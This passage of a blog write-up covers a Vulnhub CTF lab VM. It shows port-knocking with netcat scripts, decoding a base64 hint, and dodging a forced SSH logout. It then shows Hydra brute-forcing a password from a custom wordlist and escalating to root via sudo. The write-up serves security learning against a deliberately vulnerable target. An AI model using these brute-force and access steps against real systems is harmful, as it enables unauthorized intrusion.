<br />
<br />
<span style="font-size: small;">cat knock1.sh </span><br />
<span style="font-size: small;">#!/bin/bash</span><br />
<span style="font-size: small;">nc -v 192.168.56.102 7000</span><br />
<span style="font-size: small;">nc -v 192.168.56.102 8000</span><br />
<span style="font-size: small;">nc -v 192.168.56.102 9000</span><br />
<span style="font-size: small;">nc -v 192.168.56.102 8888</span><br />
<br />
</div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i><span style="color: blue;">After a few frustrating attempts, it finally worked!</span></i></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> </span><br />
<br />
<span style="font-size: small;">./knock1.sh </span><br />
<span style="font-size: small;">nc: connect to 192.168.56.102 port 7000 (tcp) failed: Connection refused</span><br />
<span style="font-size: small;">nc: connect to 192.168.56.102 port 8000 (tcp) failed: Connection refused</span><br />
<span style="font-size: small;">nc: connect to 192.168.56.102 port 9000 (tcp) failed: Connection refused</span><br />
<span style="font-size: small;">Connection to 192.168.56.102 8888 port [tcp/*] succeeded!</span><br />
<span style="font-size: small;">/burgerworld/</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i><span style="color: blue;"> </span></i></span><br />
<br />
<span style="font-size: small;"><i><span style="color: blue;">Visiting the site with a browser gives:</span></i></span><br />
<span style="font-size: small;"><br /></span>
<br />
<span style="font-size: small;"><br /></span>
<br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt7WuYHvXxIIF-H9sfBeYKIwPKhEWn73IZ9RT-rM3bALL6JTRWoCTha5rxvmF8A9KrVWXOGgRbGjPajHKmFvcQFVv4Wpw6LMNUJQV0QiOoWkmpb663gak1fa0fZapB_qE7bEDjFt7Q804/s1600/second+burgerworld+Screenshot+-+150415+-+22:49:35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt7WuYHvXxIIF-H9sfBeYKIwPKhEWn73IZ9RT-rM3bALL6JTRWoCTha5rxvmF8A9KrVWXOGgRbGjPajHKmFvcQFVv4Wpw6LMNUJQV0QiOoWkmpb663gak1fa0fZapB_qE7bEDjFt7Q804/s320/second+burgerworld+Screenshot+-+150415+-+22:49:35.png" height="122" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="color: blue; font-size: small;"><span style="background-color: #eeeeee;"><i>The link gives another pcap file, pcap2.pcap.</i></span></span><br />
<br />
<br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="color: blue; font-size: small;"><span style="background-color: #eeeeee;"><i> </i></span></span><span style="font-size: small;">
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT5sJPCcIXHC_nzPmGCZuAZ_Hlz4wqIiEmP0pBKQZYEczWsR8I-5xzG4HGAPSR7B1dLpdzEY454XDRtI5y50wSK07V_rKM_Blumqpy4DJx7exWwKkl02eqHE7puaPz7uzx3p-UWZMEkss/s1600/pcap2+Screenshot+-+150415+-+22:53:17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT5sJPCcIXHC_nzPmGCZuAZ_Hlz4wqIiEmP0pBKQZYEczWsR8I-5xzG4HGAPSR7B1dLpdzEY454XDRtI5y50wSK07V_rKM_Blumqpy4DJx7exWwKkl02eqHE7puaPz7uzx3p-UWZMEkss/s320/pcap2+Screenshot+-+150415+-+22:53:17.png" height="51" width="400" /> </a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>Wireshark shows some more ICMP and ARP traffic.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>however more connections are established, to different ports</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>Connections to TCP 21, UDP 22, TCP 80 and 8080, then a connection was estabished to http-alt (port 8080) and data went back and fourth.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZuy04tWE-3WnIca8vuQziCLYsyg107lnIlV1LzUbK941vofMoFvMv0p36j6qnZAd0yQTP8TfxH4ZjBCr1NQzWFJPfL5japUScESiKaN4ckU_GqOTcYb7faGryQJRAd5mNifhmugHWa5w/s1600/pcap2+stream+Screenshot+-+150415+-+23:00:03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZuy04tWE-3WnIca8vuQziCLYsyg107lnIlV1LzUbK941vofMoFvMv0p36j6qnZAd0yQTP8TfxH4ZjBCr1NQzWFJPfL5japUScESiKaN4ckU_GqOTcYb7faGryQJRAd5mNifhmugHWa5w/s320/pcap2+stream+Screenshot+-+150415+-+23:00:03.png" height="280" width="400" /> </a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>So i probed with another bash script to ports 1,3,3,7 to no avail.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>I decided to go slightly more upmarket and use <a href="https://github.com/hack1thu7ch/knock-knock">knock-knock.</a></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>After a bit of tweaking the script kicked in.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">[-] Scanning 192.168.56.102 with Nmap, this could take a minute...go get some coffee<br /><br />[-] Sending default knockd sequence to 192.168.56.102<br /><br />[-] Scanning again...too soon for more coffee???<br /><br />[+] 1 new port(s) opened...<br />(1337, 'tcp')<br /><br />Writing to output file - outfile.txt<i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><br /></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>it showed port 1337 was now open</i></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><i>nc -vv 192.168.56.102 1337<br />Connection to 192.168.56.102 1337 port [tcp/*] succeeded!<br />/iamcornholio/</i><span style="color: blue;"><i><br /></i></span></span><br />
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVgSoWBTLvmByPYEtt217W03xCw2zDWr1nE8pvdwwgP0feFV3KeVFA5_TvfenwPjDjYrOqXm65OwH9FGxuJI2t4UnKaQpqsn5WwKbOz6wRjfC0Nnx3gjstr2PTBQmWszhGHEDgjxS7fXY/s1600/cornholio+Screenshot+-+150415+-+23:13:48.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVgSoWBTLvmByPYEtt217W03xCw2zDWr1nE8pvdwwgP0feFV3KeVFA5_TvfenwPjDjYrOqXm65OwH9FGxuJI2t4UnKaQpqsn5WwKbOz6wRjfC0Nnx3gjstr2PTBQmWszhGHEDgjxS7fXY/s320/cornholio+Screenshot+-+150415+-+23:13:48.png" height="61" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">No Pcap file this time though, however "all about that base" was a clue</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"> <span style="color: black;">echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" > base64_encoded.txt<br /><br />base64 -d base64_encoded.txt <br />Open up SSH: 8888 9999 7777 6666</span></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><span style="color: black;"><span style="color: blue;">Another knocking sequence, so i returned to my bash script method.</span></span></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i> #!/bin/bash<br />nc -v 192.168.56.102 8888 <br />nc -v 192.168.56.102 9999<br />nc -v 192.168.56.102 7777<br />nc -v 192.168.56.102 6666<br />nc -v 192.168.56.102 22</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><span style="color: black;">./knock4.sh <br />nc: connect to 192.168.56.102 port 8888 (tcp) failed: Connection refused<br />nc: connect to 192.168.56.102 port 9999 (tcp) failed: Connection refused<br />nc: connect to 192.168.56.102 port 7777 (tcp) failed: Connection refused<br />nc: connect to 192.168.56.102 port 6666 (tcp) failed: Connection refused<br />Connection to 192.168.56.102 22 port [tcp/ssh] succeeded!<br />SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2</span></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><span style="color: black;"><span style="color: blue;">Port 22 is not open, nice one!</span> </span></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> ############################################<br /># CONGRATS! YOU HAVE OPENED THE SSH SERVER #<br /># USERNAME: butthead #<br /># PASSWORD: nachosrule #<br />############################################</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">However this was not to be as smooth as i initally thought..</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">butthead@192.168.56.102's password: <br />Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)<br /><br /> * Documentation: https://help.ubuntu.com/<br />Last login: Sun Apr 12 15:01:54 2015 from 192.168.56.1<br />You are only logging in for a split second! What do you do!<br />Connection to 192.168.56.102 closed.<br /><br /><span style="color: blue;"><i> </i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>A little digging in the man pages of ssh i stumbled across it</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i> </i></span><br /><br />NAME<br /> ssh — OpenSSH SSH client (remote login program)<br /><br />SYNOPSIS<br /> ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]<br /> [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file]<br /> [-L [bind_address:]port:host:hostport] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option]<br /> [-p port] [-Q cipher | cipher-auth | mac | kex | key] [-R [bind_address:]port:host:hostport]<br /> [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]<br /><br /><br /><br /><br /><br />ssh -l butthead 192.168.56.102 /bin/bash<br />butthead@192.168.56.102's password: <br /><i><span style="color: blue;"></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"> After a few seconds waiting thinking i gave the "ls" command</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;"><br /></span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">ls<br />files.txt<br />nachos<br />id<br />uid=1001(butthead) gid=1001(butthead) groups=1001(butthead)<br />cat nachos<br />Great job on getting this far.<br /><br />Can you login as beavis or root ?<i><span style="color: blue;"><br /></span></i></span> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>this was another hint..</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">cat /etc/passwd | grep beavis<br />beavis:x:1000:1000:beavis,,,:/home/beavis:/bin/bash</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i>I took a while looking through the home folder of "beavis" and not finding much, I decided to set hydra loose on the ssh service.</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i> After no luck using conventional wordlists I used <a href="https://digi.ninja/projects/cewl.php" target="_blank">cewl</a> to generate my own from a wikipedia page on <a href="https://en.wikipedia.org/wiki/Beavis_and_Butt-head" target="_blank">Beavis and Butthead</a></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><span style="color: black;">[DATA] attacking service ssh on port 22<br />[ERROR] ssh protocol error<br />[ERROR] ssh protocol error<br />---snip-----<br />[ERROR] ssh protocol error<br />[22][ssh] host: 192.168.56.101 login: beavis password: mikejudge<br />1 of 1 target successfully completed, 1 valid password found<br />Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-12 22:08:18</span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i> Hydra had found a valid password for the user "beavis"</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i><br />Logging in....</i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue; font-size: small;"><i> </i></span><span style="font-size: small;"> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i>beavis@192.168.56.102's password: <br />Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-46-generic i686)<br /><br /> * Documentation: https://help.ubuntu.com/<br />Last login: Sun Apr 12 17:07:32 2015 from 192.168.56.1<br />beavis@Huhuhhhhhuhuhhh:~</i>$ </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>It was starting to go very well, time to start looking for ways to obtain root...</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">beavis@Huhuhhhhhuhuhhh:~$ id<br />uid=1000(beavis) gid=1000(beavis) groups=1000(beavis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)<br /> </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">beavis@Huhuhhhhhuhuhhh:~$ sudo -l<br />[sudo] password for beavis: </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br />Matching Defaults entries for beavis on Huhuhhhhhuhuhhh:<br /> env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin<br /><br />User beavis may run the following commands on Huhuhhhhhuhuhhh:<br /> (ALL : ALL) ALL<br />beavis@Huhuhhhhhuhuhhh:~$</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><i><span style="color: blue;">A quick check of id shows beavis is : groups 27(sudo) and can commands ( ALL : ALL ) ALL</span></i></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;">beavis@Huhuhhhhhuhuhhh:~$ sudo bash<br />root@Huhuhhhhhuhuhhh:~# id<br />uid=0(root) gid=0(root) groups=0(root)<br />root@Huhuhhhhhuhuhhh:~# cd /root<br />root@Huhuhhhhhuhuhhh:/root# ls<br />SECRETZ<br />root@Huhuhhhhhuhuhhh:/root# more SECRETZ <br />You have done a great job, if you can see this, please shoot me an email<br />and let me know that you have beat this box!<br /><br />SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"<br /><br />admin@top-hat-sec.com<br /><br /><br />root@Huhuhhhhhuhuhhh:/root# </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><u><b>Fin</b></u>:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>Thanks to everyone at Vulnhub for the guidance over the time ive been there.</i></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: small;"><span style="color: blue;"><i>Special Thanks To Tophatsec for creating this challenge</i></span>.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />Contactlefthttp://www.blogger.com/profile/03201194237594098458noreply@blogger.com2